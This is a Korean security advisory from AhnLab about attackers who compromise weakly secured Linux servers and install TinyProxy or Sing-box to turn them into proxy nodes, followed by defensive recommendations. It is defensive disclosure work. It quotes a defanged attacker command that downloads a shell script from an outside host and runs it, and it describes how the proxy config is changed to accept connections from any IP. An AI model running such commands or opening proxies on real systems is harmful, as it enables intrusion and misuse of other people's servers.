리눅스 서버 대상 프록시 툴 악용 공격 주의

안랩은 최근 보안 관리가 미흡한 리눅스 서버를 대상으로 공격자가 프록시 도구를 설치해 시스템을 중계지로 악용하는 사레를 다수 포착했다. 공격자는 TinyProxy나 Sing-box와 같은 정상 소프트웨어 또는 오픈 소스 도구를 활용해 별도의 악성 행위 없이도 시스템을 프록시 노드로 전환시키고 있었다. 이번 글에서는 공격자들이 이런 도구를 선택한 이유와 공격의 주요 특징, 그리고 그 배경에 숨은 목적에 대해 살펴보자.

 

 

1. TinyProxy 설치 사례
공격자는 취약한 리눅스 서버에 로그인을 시도했으며, 로그인에 성공한 후에는 아래와 같은 명령으로 Bash 악성코드를 다운로드해 실행했다.

 

# (wget -O s.sh hxxps://0x0[.]st/8VDs.sh || curl -o s.sh hxxps://0x0[.]st/8VDs.sh) && chmod +x s.sh && sh s.sh

 

 

[그림 1] 폴란드어 주석이 포함된 악성 Bash 스크립트

 

Bash 스크립트는 운영체제 환경에 맞게 apt, yum, dnf를 이용해 TinyProxy를 설치한다. 이후 설정 파일을 조작해 외부에서 접속이 가능하도록 한 후 지속성을 유지시킨다.

 

[그림 2] TinyProxy 설정 및 지속성 유지 루틴

 

구체적으로는, TinyProxy의 설정 파일인 “/etc/tinyproxy/tinyproxy.conf” 또는 “/etc/tinyproxy.conf”에서 Allow 및 Deny로 시작하는 접근 제어 규칙을 삭제한 후 “Allow 0.0.0.0/0” 규칙을 추가한다.

 

이 설정은 모든 외부 IP의 접속을 허용하도록 구성하는 것으로, 공격자는 TinyProxy가 사용하는 포트인 8888번에 자유롭게 접근해 감염된 시스템을 프록시 서버로 악용할 수 있다.

 

[그림 3] 주석 처리 및 삽입된 TinyProxy 설정

 

2. Sing-box 설치 사례
다음으로 Sing-box라는 이름의 프록시 도구를 설치하는 공격 사례를 소개한다. 공격자는 다음과 같은 명령으로 Sing-box를 설치했다.

 

 

 

 

Sing-box는 vmess-argo, vless-reality, Hysteria2, TUICv5 등의 프로토콜을 지원하는 다목적 프록시 설치 도구다. 깃허브(GitHub) 설명에 따르면, 이 오픈 소스를 활용해 챗GPT(ChatGPT)나 넷플릭스(Netflix) 등 특정 서비스의 지역 차단을 우회할 수 있다.

 

공격자는 일부 국가에서 이러한 서비스 이용이 제한되는 점을 고려해, 우회 접속을 지원하기 위한 목적으로 Sing-box를 개발한 것으로 보인다.

 

실제로 사용자는 해외에 위치한 가상 사설 서버(VPS)에 Sing-box를 설치해 프록시로 활용함으로써 다양한 우회 프로토콜을 통해 차단된 서비스에 접근할 수 있다. 하지만 이번 사례에서는 공격자가 타인의 시스템에 무단으로 침입해 Sing-box를 설치했으며, 이를 통해 불법적인 목적의 사용이나 금전적 이익을 노린 것으로 추정된다.

 

[그림 4] Sing-box 깃허브 페이지

 

3. 결론

최근 부적절하게 관리되고 있는 리눅스 서버를 대상으로 프록시를 설치하는 사례가 다수 확인되고 있다. 특히, TinyProxy나 Sing-box처럼 정상적인 소프트웨어를 악용해 프록시 기능을 수행하도록 만든다는 점이 주요 특징이다.

 

공격자는 감염된 시스템을 프록시 노드로 활용해 자신의 위치를 은폐하거나 프록시 접근 권한을 제3자에게 판매해 금전적 이익을 추구할 가능성도 있다.

 

이런 위협에 대응하기 위해 관리자는 다음과 같은 보안 수칙을 반드시 준수해야 한다.

 

1) 계정의 비밀번호는 추측하기 어려운 형태로 사용하고 주기적으로 변경해 무차별 대입 공격과 사전 공격으로부터 리눅스 서버를 보호해야 한다.

 

2) 외부에 노출된 서버에는 방화벽 등 네트워크 보안 솔루션을 적용해 불필요한 접근을 차단해야 한다.

 

3) V3와 같은 백신 프로그램을 최신 버전으로 유지하며 악성코드의 감염을 사전에 차단해야 한다.

 

 

출처 : AhnLab

02-553-2331
견적 요청
카카오톡 문의